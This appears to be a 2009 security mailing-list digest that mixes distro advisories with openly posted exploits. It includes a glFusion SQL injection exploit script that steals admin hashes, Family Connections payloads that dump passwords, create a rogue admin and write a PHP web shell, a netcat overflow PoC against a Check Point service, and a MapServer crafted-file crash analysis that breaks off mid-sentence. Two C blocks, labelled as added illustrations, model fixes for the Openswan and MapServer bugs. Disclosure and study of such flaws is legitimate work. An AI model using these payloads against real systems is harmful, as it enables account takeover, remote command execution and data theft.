[USN-745-1] Firefox and Xulrunner vulnerabilities

2009-03-30 Thread Jamie Strandboge
===
Ubuntu Security Notice USN-745-1 March 28, 2009
firefox, firefox-3.0, xulrunner-1.9 vulnerabilities
CVE-2009-1044, CVE-2009-1169
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  firefox 1.5.dfsg+1.5.0.15~prepatch080614l-0ubuntu1

Ubuntu 7.10:
  firefox 2.0.0.21~tb.21.308+nobinonly-0ubuntu0.7.10.1

Ubuntu 8.04 LTS:
  firefox-3.0 3.0.8+nobinonly-0ubuntu0.8.04.2
  xulrunner-1.9   1.9.0.8+nobinonly-0ubuntu0.8.04.1

Ubuntu 8.10:
  abrowser 3.0.8+nobinonly-0ubuntu0.8.10.2
  firefox-3.0 3.0.8+nobinonly-0ubuntu0.8.10.2
  xulrunner-1.9   1.9.0.8+nobinonly-0ubuntu0.8.10.1

After a standard system upgrade you need to restart Firefox and any
applications that use xulrunner, such as Epiphany, to effect the necessary
changes.

Details follow:

It was discovered that Firefox did not properly perform XUL garbage
collection. If a user were tricked into viewing a malicious website, a
remote attacker could cause a denial of service or execute arbitrary code
with the privileges of the user invoking the program. This issue only
affected Ubuntu 8.04 LTS and 8.10. (CVE-2009-1044)

A flaw was discovered in the way Firefox performed XSLT transformations.
If a user were tricked into opening a crafted XSL stylesheet, an attacker
could cause a denial of service or execute arbitrary code with the
privileges of the user invoking the program. (CVE-2009-1169)


Updated packages for Ubuntu 6.06 LTS:


[SECURITY] [DSA 1756-1] New xulrunner packages fix multiple vulnerabilities

2009-03-30 Thread Noah Meyerhans

--------------------------------------------------------------------------
Debian Security Advisory DSA-1756-1                    secur...@debian.org
http://www.debian.org/security/                            Noah Meyerhans
March 29, 2009                        http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package: xulrunner
Vulnerability  : multiple
Problem type   : remote
Debian-specific: no
CVE Id(s)  : CVE-2009-1169 CVE-2009-1044

Several remote vulnerabilities have been discovered in Xulrunner, a
runtime environment for XUL applications, such as the Iceweasel web
browser. The Common Vulnerabilities and Exposures project identifies
the following problems:

CVE-2009-1169

Security researcher Guido Landi discovered that an XSL stylesheet could
be used to crash the browser during an XSL transformation. An attacker
could potentially use this crash to run arbitrary code on a victim's
computer.

CVE-2009-1044

Security researcher Nils reported via TippingPoint's Zero Day Initiative
that the XUL tree method _moveToEdgeShift was in some cases triggering
garbage collection routines on objects which were still in use. In such
cases, the browser would crash when attempting to access a previously
destroyed object and this crash could be used by an attacker to run
arbitrary code on a victim's computer.

Note that after installing these updates, you will need to restart any
packages using xulrunner, typically iceweasel or epiphany.

For the stable distribution (lenny), these problems have been fixed in version
1.9.0.7-0lenny2.

As indicated in the Etch release notes, security support for the
Mozilla products in the oldstable distribution needed to be stopped
before the end of the regular Etch security maintenance life cycle.
You are strongly encouraged to upgrade to stable or switch to a still
supported browser.

For the unstable distribution (sid), these problems have been fixed in
version 1.9.0.8-1.

We recommend that you upgrade your xulrunner package.

Upgrade instructions
--------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
-------------------------------

Debian GNU/Linux 5.0 alias lenny
--------------------------------

Debian (stable)
---------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, 
mips, mipsel, powerpc, s390 and sparc.


[tool release] Watcher v1.0.0 - passive Web-app security testing and compliance auditing

2009-03-30 Thread Chris Weber
Watcher is a runtime passive-analysis tool for HTTP-based Web applications. 
It complements static code analysis and manual security reviews by providing
painless verification of operational and code-level issues at runtime. 
Watcher works seamlessly with today’s complex Web 2.0 applications by
running silently in the background while you drive your browser and interact
with the Web-application. 

It is being released for free under an Open Source license, the binaries and
source are available through CodePlex at
http://websecuritytool.codeplex.com/.  A screenshot of the reporting screen
is also there.

This tool provides pen-testers hot-spot detection for vulnerabilities,
developers quick sanity checks, and auditors PCI compliance auditing.  It
looks for issues related to mashups, user-controlled payloads, cookies,
comments, HTTP headers, SSL, Flash, Silverlight, referrer leaks, information
disclosure, Unicode, and more.

Major Features:
1. Silent and passive detection of security, privacy, and PCI compliance
issues in HTTP, HTML, Javascript, and CSS
2. Works seamlessly with complex Web 2.0 applications while you drive the
Web browser
3. Non-intrusive, will not raise alarms or damage production sites
4. Real-time analysis and reporting - findings are reported as they’re
found, exportable to XML
5. Configurable domains with wildcard support
6. Extensible framework for adding new checks

Watcher is built as a plugin for the Fiddler HTTP debugging proxy available
at www.fiddlertool.com.  It’s built in C# as a small framework with 30+
checks already included. New checks can be easily created to perform custom
audits specific to your policies, or to perform more general-purpose
security assessments. Examples of the types of issues Watcher will currently
identify:

Cross-domain stylesheet and javascript references
User-controllable cross-domain references 
User-controllable attribute values such as href, form action, etc. 
Cross-domain form POSTs
Insecure cookies which don't set the HTTPOnly or secure flags
Open redirects which can be abused by spammers and phishers
Insecure Flash object access through allowScriptAccess
Insecure Flash crossdomain.xml
Insecure Silverlight clientaccesspolicy.xml
Charset declarations which could introduce vulnerability (non-UTF-8)
User-controllable charset declarations 
Dangerous context-switching between HTTP and HTTPS
Insufficient use of cache-control headers when private data is concerned
(e.g. no-store)
Potential HTTP referer leaks of sensitive user-information
Potential information leaks in URL parameters
Source code comments worth a closer look
Hidden debugging messages from Web and Database servers
Insecure authentication protocols like Digest and Basic
SSL certificate validation errors
SSL insecure protocol issues (allowing SSL v2)
Unicode issues with invalid byte streams
more...

Reducing false positives is a high priority, suggestions are welcome.  Right
now each check takes steps to reduce false positives, some better than
others, and checks can be individually disabled if they’re generating too
much noise.  E.g. we know that only certain cookies such as session cookies
need HttpOnly set, but figuring this out automatically has proven difficult
without requiring the user to specify the cookie name.  

New checks are being planned, and new check ideas or contributions are very
welcome.  For example:

   Unicode transformation hot-spot detection (planned) 
   User-controllable javascript events (planned)

Contact me with any questions, bugs, or suggestions.

-Chris Weber




[ GLSA 200903-40 ] Analog: Denial of Service

2009-03-30 Thread Pierre-Yves Rofes
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200903-40
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Analog: Denial of Service
      Date: March 29, 2009
      Bugs: #249140
        ID: 200903-40

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A Denial of Service vulnerability was discovered in Analog.

Background
==========

Analog is a webserver log analyzer.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  app-admin/analog        < 6.0-r2                         >= 6.0-r2

Description
===========

Diego E. Petteno reported that the Analog package in Gentoo is built
with its own copy of bzip2, making it vulnerable to CVE-2008-1372 (GLSA
200804-02).

Impact
======

A local attacker could place specially crafted log files into a log
directory being analyzed by analog, e.g. /var/log/apache, resulting in
a crash when being processed by the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Analog users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =app-admin/analog-6.0-r2

NOTE: Analog is now linked against the system bzip2 library.

References
==========

  [ 1 ] CVE-2008-1372
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1372
  [ 2 ] GLSA 200804-02
http://www.gentoo.org/security/en/glsa/glsa-200804-02.xml

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200903-40.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5







glFusion <= 1.1.2 COM_applyFilter()/order sql injection exploit

2009-03-30 Thread nospam
 
<?php
/*
glFusion <= 1.1.2 COM_applyFilter()/order sql injection exploit
by Nine:Situations:Group::bookoo

working against MySQL >= 4.1
php.ini independent

  our site: http://retrogod.altervista.org/
software site: http://www.glfusion.org/

google dork: Page created in seconds by glFusion +RSS

Vulnerability, sql injection in 'order' and 'direction' arguments:
look at the ExecuteQueries() function in
/private/system/classes/listfactory.class.php, near line 336:
...

// Get the details for sorting the list
$this->_sort_arr['field'] = isset($_REQUEST['order']) ?
    COM_applyFilter($_REQUEST['order']) : $this->_def_sort_arr['field'];
$this->_sort_arr['direction'] = isset($_REQUEST['direction']) ?
    COM_applyFilter($_REQUEST['direction']) : $this->_def_sort_arr['direction'];
if (is_numeric($this->_sort_arr['field'])) {
    $ord = $this->_def_sort_arr['field'];
    $this->_sort_arr['field'] = SQL_TITLE;
} else {
    $ord = $this->_sort_arr['field'];
}

$order_sql = ' ORDER BY ' . $ord . ' ' .
    strtoupper($this->_sort_arr['direction']);
...

filters are inefficient, see COM_applyFilter() which calls
COM_applyBasicFilter() in /public/lib-common.php near line 5774.

We are in an ORDER clause and vars are not surrounded by quotes,
bad chars are ex. , , / ,', ;, \,,*,`
  but what about spaces and (... you can use a CASE WHEN .. THEN .. 
ELSE .. END
  construct instead of ex. IF(..,..,..) and -- instead of /* to 
close
  your query.
  And ex. the alternative syntax SUBSTR(str FROM n FOR n) instead of
SUBSTR(str,n,n) in a sub-SELECT statement.
  Other attacks are possible, COM_applyFilter() is a very commonly used
one.

  Additional notes: 'direction' argument is uppercased by strtoupper(),
  you know that table identifiers on Unix-like systems are case
sensitive
  but not on MS Windows, however I chose to inject in the 'order' one
for better results.
  Vars come from the $_REQUEST[] array so you can pass it by $_POST[] or
  $_COOKIE[], which is not intended I suppose.
  
This exploit extracts the hash from users table; also note that you do
not need to crack the hash, you can authenticate as admin with the
cookie:

  glfusion=[uid]; glf_password=[hash];

  as admin you can upload php files in public folders!

  Very soft mitigations: glFusion does not show the table prefix in sql
errors, default however is 'gl_'. I prepared a fast routine to extract
it from information_schema db if available.
  To successfully interrogate MySQL you need at least 2 records in the
same topic section, however the default installation creates 2 links with
topic glFusion

*/

$err[0]="[!] This script is intended to be launched from the cli!";
$err[1]="[!] You need the curl extension loaded!";

if (php_sapi_name() != "cli") {
    die($err[0]);
}
if (!extension_loaded('curl')) {
    $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
    if ($win) {
        !dl("php_curl.dll") ? die($err[1]) : null;
    }
    else {
        !dl("php_curl.so") ? die($err[1]) : null;
    }
}

function syntax(){
    global $argv;   // $argv is not visible inside a function without this
    print ("Syntax: php ".$argv[0]." [host] [path] [[port]] [OPTIONS]\n".
           "Options:\n".
           "  --port:[port]        - specify a port\n".
           "                         default - 80\n".
           "  --prefix             - try to extract table prefix from information.schema\n".
           "                         default - gl_\n".
           "  --uid:[n]            - specify an uid other than default (2,usually admin)\n".
           "  --proxy:[host:port]  - use proxy\n".
           "  --enforce            - try even with 'not vulnerable' message\n");
    die();
}

error_reporting(E_ALL ^ E_NOTICE);
$host=$argv[1];
$path=$argv[2];
$prefix="gl_";  //default
$uid=2;
$where="uid=$uid"; //user id, usually admin, anonymous = 1

$argv[2] ? print("[*] Attacking...\n") : syntax();
$_f_prefix=false;
$_use_proxy=false;
$port=80;

[ MDVSA-2009:081 ] libsoup

2009-03-30 Thread security


 ___

 Mandriva Linux Security Advisory MDVSA-2009:081
 http://www.mandriva.com/security/
 ___

 Package : libsoup
 Date: March 27, 2009
 Affected: 2008.0, Corporate 3.0
 ___

 Problem Description:

 An integer overflow in libsoup Base64 encoding and decoding functions
 enables attackers either to cause a denial of service or to execute
 arbitrary code (CVE-2009-0585).
 
 This update provides the fix for that security issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0585
 ___

 Updated Packages:

 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com



Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow

2009-03-30 Thread Bugs NotHugs
- Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow

- Description

The Check Point Firewall-1 PKI Web Service, running by default on TCP
port 18264, is vulnerable to a remote overflow in the handling of very
long HTTP headers. This was discovered during a pen-test where the
client would not allow further analysis and would not provide the full
product/version info. Initial testing indicates the 'Authorization'
and 'Referer' headers were vulnerable.

- Product

Check Point, Firewall-1, unknown

- PoC

perl -e 'print GET / HTTP/1.0\r\nAuthorization: Basic . x x 8192 .
\r\nFrom: b...@hugs.com\r\nif-modified-since: Fri, 13 Dec 2006
09:12:58 GMT\r\nReferer: http://www.owasp.org/; . x x 8192 .
\r\nUserAgent: FsckResponsibleDisclosure 1.0\r\n\r\n' | nc
suckit.com 18264

- Solution

None

- Timeline

2006-11-06: Vulnerability Discovered
2009-03-29: Disclosed to Public

-- 

BugsNotHugs
Shared Vulnerability Disclosure Account


CVE-2009-0790: ISAKMP DPD Remote Vulnerability with Openswan Strongswan IPsec

2009-03-30 Thread Paul Wouters


==
Openswan & Strongswan Security Notification                March 30, 2009
Remote DoS Vulnerability in Openswan & Strongswan IPsec
CVE-2009-0790
==
A vulnerability in the Dead Peer Detection (RFC-3706) code was found by
Gerd v. Egidy gerd.von.eg...@intra2net.com of Intra2net AG affecting
all Openswan and all Strongswan releases.

A malicious (or expired ISAKMP) R_U_THERE or R_U_THERE_ACK Dead Peer
Detection packet can cause the pluto IKE daemon to crash and restart. No
authentication or encryption is required to trigger this bug. One spoofed
UDP packet can cause the pluto IKE daemon to restart and be unresponsive
for a few seconds while restarting.

A patch was created by Paul Wouters p...@xelerance.com for Openswan and
Strongswan.

This bug affects the following software releases:

Current branches:

Openswan-2.6.20 and earlier
Strongswan-4.2.13 and earlier

Maintenance mode branches:

Openswan-2.4.13 and earlier
Strongswan-2.8.8 and earlier

End of Life branches:

Superfreeswan-1.9x
Openswan-1.x
Openswan-2.0.x - 2.3.1
Openswan-2.5.x

Everyone is strongly encouraged to upgrade to these minimum versions:

openswan-2.6.21
strongswan-4.2.14

openswan-2.4.14
strongswan-2.8.9

If you cannot upgrade to a new version, please apply the appropriate
patch as listed at http://www.openswan.org/CVE-2009-0790/

Dead Peer Detection is an IPsec IKE Notification message. It uses
an ICOOKIE/RCOOKIE mechanism to match an incoming packet to a known
Security Association (ISAKMP). Unlike most Notification messages, DPD
notifications have no phase2 state association.  Incorrect handling of
this exception can cause a NULL pointer dereference on a non-existing
state object 'st'. This bug is triggered in the case where one end has
expired an ISAKMP state, but the other end still uses the old state
to send a DPD Notification.

Since this state-lookup is performed before any encryption or
decryption takes place, as we need to find the proper ISAKMP to locate
the cryptographic key material used for decryption, this bug can be
triggered without going through a phase1 (ISAKMP) negotiation.

When such a packet is received, the pluto daemon crashes and restarts.

Locations for downloading patches and source code:
http://www.openswan.org/   http://www.strongswan.org/
ftp://ftp.openswan.org/openswan/   http://download1.strongswan.org/
ftp://ftp.openswan.fi/pub/openswan/http://download2.strongswan.org/

Paul Wouters p...@xelerance.com
GPG key: 0xB5CC27E1
==

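A simplified model of the failure mode described in the notification above, added here as an illustration and not code from Openswan or Strongswan: a DPD notification is matched to an ISAKMP state by its cookies before any decryption, so once the local state has expired the lookup yields NULL and the handler has to drop the packet instead of touching `st`. The state table, the struct fields and all function names are assumptions; the cookies are constructed sample values.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

#define COOKIE_SIZE 8      /* ISAKMP initiator and responder cookies are 8 octets each */
#define MAX_STATES  4      /* constructed: a tiny stand-in for the daemon's state table */

struct isakmp_state {
    int      in_use;
    uint8_t  icookie[COOKIE_SIZE];
    uint8_t  rcookie[COOKIE_SIZE];
    uint32_t dpd_seqno;    /* last R_U_THERE sequence number seen from the peer */
};

static struct isakmp_state state_table[MAX_STATES];

enum dpd_result { DPD_IGNORED = 0, DPD_HANDLED = 1 };

/* Install an ISAKMP state for a cookie pair. Returns 0, or -1 if the table is full. */
int add_isakmp_state(const uint8_t *ic, const uint8_t *rc)
{
    for (int i = 0; i < MAX_STATES; i++) {
        if (!state_table[i].in_use) {
            memcpy(state_table[i].icookie, ic, COOKIE_SIZE);
            memcpy(state_table[i].rcookie, rc, COOKIE_SIZE);
            state_table[i].dpd_seqno = 0;
            state_table[i].in_use = 1;
            return 0;
        }
    }
    return -1;
}

/* Cookie lookup on the raw packet header, before any decryption: NULL when no SA matches. */
struct isakmp_state *find_state_by_cookies(const uint8_t *ic, const uint8_t *rc)
{
    for (int i = 0; i < MAX_STATES; i++) {
        if (state_table[i].in_use &&
            memcmp(state_table[i].icookie, ic, COOKIE_SIZE) == 0 &&
            memcmp(state_table[i].rcookie, rc, COOKIE_SIZE) == 0) {
            return &state_table[i];
        }
    }
    return NULL;
}

/* Expire (delete) the ISAKMP state for a cookie pair, as one end does on timeout. */
void expire_isakmp_state(const uint8_t *ic, const uint8_t *rc)
{
    struct isakmp_state *st = find_state_by_cookies(ic, rc);
    if (st != NULL) st->in_use = 0;
}

/* R_U_THERE / R_U_THERE_ACK handler. The NULL check is the whole point: without it a
   spoofed packet carrying the cookies of an expired SA dereferences st and crashes. */
enum dpd_result handle_dpd_notify(const uint8_t *ic, const uint8_t *rc, uint32_t seqno)
{
    struct isakmp_state *st = find_state_by_cookies(ic, rc);
    if (st == NULL) {
        fprintf(stderr, "DPD: no ISAKMP SA for these cookies, ignoring notification\n");
        return DPD_IGNORED;
    }
    st->dpd_seqno = seqno;     /* safe: st points at a live state */
    return DPD_HANDLED;
}

/* Replays the scenario from the notification: the peer keeps using the cookies of an SA
   we already expired. Returns 1 when the live packet is handled and the stale one ignored. */
int demo_stale_dpd(void)
{
    static const uint8_t ic[COOKIE_SIZE] = {1, 2, 3, 4, 5, 6, 7, 8};        /* constructed */
    static const uint8_t rc[COOKIE_SIZE] = {9, 10, 11, 12, 13, 14, 15, 16}; /* constructed */

    memset(state_table, 0, sizeof state_table);
    if (add_isakmp_state(ic, rc) != 0) return 0;
    enum dpd_result live = handle_dpd_notify(ic, rc, 1);
    expire_isakmp_state(ic, rc);
    enum dpd_result stale = handle_dpd_notify(ic, rc, 2);
    return live == DPD_HANDLED && stale == DPD_IGNORED;
}

int main(void)
{
    printf("stale DPD packet after expiry: %s\n",
           demo_stale_dpd() ? "ignored without crash" : "UNEXPECTED");
    return 0;
}
```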


Positron Security Advisory #2009-000: Multiple Vulnerabilities in MapServer v5.2.1 and v4.10.3

2009-03-30 Thread Positron Security



   POSITRON SECURITY LLC
http://www.positronsecurity.com/


Security Advisory #2009-000
  Multiple Vulnerabilities in MapServer v5.2.1 and v4.10.3



Author:  Joe Testa jt _at_sign_ positronsecurity_dot_com
Date:March 30th, 2009
URL: http://www.positronsecurity.com/advisories/2009-000.html



I. Executive Summary

MapServer [1] is a popular open-source, multi-platform program for
creating interactive map applications.  It was originally developed by
the University of Minnesota with support from the U.S. National
Aeronautics and Space Administration (NASA) [2].  It is currently
supported by the Open Source Geospatial Foundation [3].

Several security vulnerabilities were identified in MapServer v5.2.1
and v4.10.3.  All users are urged to upgrade to v5.2.2 or v4.10.4 as
soon as possible to protect against attack.



II. Overview

During an audit of the MapServer v5.2.1 source code, five (5)
vulnerabilities were identified ranging from low to medium/high
severity.  They include stack and heap overflows, a relative path
writing weakness, a file content leakage, as well as a file existence
leakage.  Furthermore, after reporting these issues to the vendor, a
second audit by the project maintainer not only determined that v4.10.3
was also affected, but that four (4) additional stack overflows existed
in the code as well.



III. Detailed Description


A. Stack-based Buffer Overflow (CVE-2009-0839)
   Severity: Medium/High

A buffer overflow that could allow for the execution of arbitrary
code exists in the mapserv CGI program.  In mapserv.c are the
following lines of code:


406:   strncpy(mapserv->Id, mapserv->request->ParamValues[i], IDSIZE);

1112:  int main(int argc, char *argv[]) {
1114:    char buffer[1024], *value=NULL;

1783:    sprintf(buffer, "%s%s%s%s", mapserv->map->web.imagepath, \
             mapserv->map->name, mapserv->Id, MS_QUERY_EXTENSION);

1826:  }


Notice that no size checking is done at line 1783 on the buffer
named buffer, defined at line 1114.  It is filled with three variables
and one static string.  The first variable,
mapserv->map->web.imagepath, is assigned the value of the IMAGEPATH
attribute inside the *.map file stored on the server.  The second,
mapserv->map->name, is taken from the NAME attribute inside the same
map file.  The third variable, mapserv->Id, is read from user input
at line 406, though it is restricted to IDSIZE (128) bytes.  Thus, a
buffer overflow can be achieved by creating a map file on the server
with overly long IMAGEPATH and/or NAME attributes; their values will be
stored past the end of buffer and will overwrite saved register
values.  If the following specially-crafted map file (bof.map) is
stored on the server (either by creating it directly, or tricking a
legitimate user into placing it onto the file system):

MAP
  NAME {A x 1072}
  STATUS ON
  SIZE 100 100
  EXTENT 0 0 1 1

  WEB
IMAGEPATH /tmp/
TEMPLATE /tmp/template.html
  END
END

... and if the following request is made:

http://site/cgi-bin/mapserv?map=/tmp/bof.map&mode=query&
 queryfile=/tmp/queryfile.qf&savequery=1&id=

... then the following crash occurs on a CentOS v5.2/x86 platform:

Program received signal SIGSEGV, Segmentation fault.
0x0804fdca in main ()
(gdb) disassemble main
[...]
0x0804fd9e <main+2318>: call   0x804bee0 <sprintf@plt>
0x0804fda3 <main+2323>: mov    %edi,0x4(%esp)
0x0804fda7 <main+2327>: mov    (%esi),%eax
0x0804fda9 <main+2329>: mov    0x10(%eax),%eax
0x0804fdac <main+2332>: mov    %eax,(%esp)
0x0804fdaf <main+2335>: call   0x8074aa0 <msSaveQuery>
0x0804fdb4 <main+2340>: test   %eax,%eax
0x0804fdb6 <main+2342>: je     0x804fb02 <main+1650>
0x0804fdbc <main+2348>: add    $0x4e8,%esp
0x0804fdc2 <main+2354>: pop    %ecx
0x0804fdc3 <main+2355>: pop    %ebx
0x0804fdc4 <main+2356>: pop    %esi
0x0804fdc5 <main+2357>: pop    %edi
0x0804fdc6 <main+2358>: pop    %ebp
0x0804fdc7 <main+2359>: lea    0xfffc(%ecx),%esp
0x0804fdca <main+2362>: ret
[...]
(gdb) i r
eax            0x1          1
ecx            0x47474747   1195853639
edx            0x0          0
ebx            0x48484848   1212696648
esp            0x47474743   0x47474743
ebp            0x4b4b4b4b   0x4b4b4b4b
esi            0x49494949   1229539657
edi            0x4a4a4a4a   1246382666
eip            0x804fdca    0x804fdca <main+2362>
[...]

Because the ECX register can be controlled (0x47 is the ASCII code for
the letter G), the attacker can control the ESP register through the
lea 0xfffc(%ecx),%esp instruction at 0x0804fdc7.  The attacker can
execute code in mapserv's process space by setting the ESP register to
an address that holds a reference to code and letting the 
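
A hardened form of the path construction from section III.A, added here as an illustration and not code from MapServer or the advisory: the id is refused at IDSIZE as line 406 intends, and the three-part concatenation is length-checked before it can reach the 1024-byte stack buffer, so the 1072-byte NAME from bof.map is rejected instead of overwriting saved registers. The value of MS_QUERY_EXTENSION, the function names and the sample map attributes are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define IDSIZE 128                 /* bound applied to the id parameter (advisory, line 406) */
#define BUFFER_SIZE 1024           /* size of buffer in mapserv's main() (advisory, line 1114) */
#define MS_QUERY_EXTENSION ".qy"   /* assumption: stand-in for MapServer's real extension */

/*
 * Build "<imagepath><name><id><ext>" into out (capacity outlen) with a length
 * check. Returns 0 on success, -1 if any part is missing, the id is not shorter
 * than IDSIZE, or the result would not fit including the terminating NUL.
 * On failure out[0] is set to '\0' so a half-built path is never used.
 */
int build_query_path(char *out, size_t outlen,
                     const char *imagepath, const char *name, const char *id)
{
    if (out == NULL || outlen == 0) return -1;
    out[0] = '\0';
    if (imagepath == NULL || name == NULL || id == NULL) return -1;

    /* Same bound the CGI applies when it copies the id (strncpy ... IDSIZE). */
    if (strlen(id) >= IDSIZE) return -1;

    /* snprintf reports the length it wanted; anything >= outlen means truncation,
       which is exactly where the original sprintf would already have overflowed. */
    int n = snprintf(out, outlen, "%s%s%s%s", imagepath, name, id, MS_QUERY_EXTENSION);
    if (n < 0 || (size_t)n >= outlen) {
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* A benign map file: short IMAGEPATH and NAME, short id. Returns 1 when the path is built. */
int demo_normal_map(void)
{
    char buffer[BUFFER_SIZE];
    int rc = build_query_path(buffer, sizeof buffer, "/tmp/", "example", "q1");
    return rc == 0 && strcmp(buffer, "/tmp/exampleq1.qy") == 0;
}

/* The advisory's bof.map: NAME of 1072 'A's (constructed here) with IMAGEPATH /tmp/.
   Returns 1 when the oversized concatenation is rejected and the buffer left empty. */
int demo_advisory_map(void)
{
    char name[1072 + 1];
    memset(name, 'A', 1072);
    name[1072] = '\0';

    char buffer[BUFFER_SIZE];
    int rc = build_query_path(buffer, sizeof buffer, "/tmp/", name, "");
    return rc == -1 && buffer[0] == '\0';
}

/* An id at or beyond IDSIZE is refused before any formatting happens. Returns 1 if refused. */
int demo_oversized_id(void)
{
    char id[IDSIZE + 1];
    memset(id, 'B', IDSIZE);
    id[IDSIZE] = '\0';

    char buffer[BUFFER_SIZE];
    return build_query_path(buffer, sizeof buffer, "/tmp/", "example", id) == -1;
}

int main(void)
{
    printf("normal map:   %s\n", demo_normal_map()   ? "path built" : "FAILED");
    printf("advisory map: %s\n", demo_advisory_map() ? "rejected"   : "NOT rejected");
    printf("oversized id: %s\n", demo_oversized_id() ? "rejected"   : "NOT rejected");
    return 0;
}
```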

Family Connections 1.8.1 Multiple Remote Vulnerabilities

2009-03-30 Thread Salvatore drosophila Fresta
***   Salvatore drosophila Fresta   ***

[+] Application: Family Connection
[+] Version: 1.8.1
[+] Website: http://www.familycms.com

[+] Bugs: [A] Multiple SQL Injection
  [B] Create Admin User
  [C] Blind SQL Injection   

[+] Exploitation: Remote
[+] Date: 25 Mar 2009

[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com


*

[+] Menu

1) Bugs
2) Code
3) Fix


*

[+] Bugs


- [A] Multiple SQL Injection

[-] Requisites: magic_quotes_gpc = on/off

These bugs allow a registered user to view
username and password of all registered users.


- [B] Create Admin User

[-] Requisites: magic_quotes_gpc = off
[-] File affected: register.php, activate.php

This bug allows a guest to create an account with
administrator privileges.


- [C] Blind SQL Injection

[-] Requisites: magic_quotes_gpc = off
[-] File affected: lostpw.php


*

[+] Code


- [A] Multiple SQL Injection

http://www.site.com/path/addressbook.php?letter=-1%25' UNION ALL
SELECT 1,2,NULL,username,5,password,email FROM fcms_users%23

http://www.site.com/path/recipes.php?category=1id=1 UNION SELECT
1,2,username,password,5,6 FROM fcms_users

http://www.site.com/path/home.php?poll_id=-1 UNION ALL SELECT
1,NULL,3,CONCAT(username, 0x3a, password) FROM fcms_users%23


- [B] Create Admin User

<html>
  <head>
    <title>Family Connection 1.8.1 Create Admin User Exploit</title>
  </head>
  <body>
    <p>This exploit creates a user with administrator privileges
    using the following information:<br>
       Username: root<br>
       Password: toor<br>
    <form action="http://localhost/fcms/register.php" method="POST">
      <input type="hidden" name="username" value="blabla">
      <input type="hidden" name="password" value="blabla">
      <input type="hidden" name="email" value="bla...@blabla.blabla">
      <input type="hidden" name="fname" value="blabla">
      <input type="hidden" name="lname" value="blabla">
      <input type="hidden" name="year"
    value="00-00-000','fakeuser','fakepassword'), (1, NOW(), 'root',
    'root', 'r...@owned.com', '00-00-00', 'root',
    '7b24afc8bc80e548d66c4e7ff72171c5')#">
      <input type="submit" name="submit" value="Exploit">
    </form>
  </body>
</html>

To activate accounts:

http://www.site.com/path/activate.php?uid=1 or 1=1&code=


- [C] Blind SQL Injection

POST /path/lostpw.php HTTP/1.1\r\n
Host: www.site.com\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 193\r\n\r\n
email=-1' UNION ALL SELECT '?php echo pre; system($_GET[cmd]);
echo /prebrbr;?',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
INTO OUTFILE '/var/www/htdocs/path/rce.php'#

To execute commands:

http://www.site.com/path/rce.php?cmd=ls


*

[+] Fix

No fix.


*

-- 
Salvatore drosophila Fresta
CWNP444351

DeepSec 2009 - Call for Papers is open

2009-03-30 Thread DeepSec Conference
=== DeepSec In-Depth Security Conference 2009 - The Third Call for Papers and Experts

The DeepSec organisation is happy to announce the Call for Papers for the
next conference in November 2009. The conference will take place at the
Imperial Riding School Renaissance Hotel in Vienna, Austria.

== Topics ==

The focus of DeepSec will be on subtle dangers, stealthy exploits and
things you don't see. If you have something to talk about that doesn't
look like a security problem at first glance, tell us about it. We'd
like to hear about underestimated security issues that may be turned
into major headaches for computer systems, networks and users alike.
Send us stories about single bits that can change our destiny. Failing that,
we welcome less sneaky approaches, too.

 - AJAX/Web2.0/JavaScript Security
 - Cloud Computing
 - Code Analysis
 - Cryptographical Weaknesses
 - Digital Espionage
 - Digital Forensics
 - eVoting
 - Failures and Fixes of all kinds
 - Incident Response
 - Malware Research
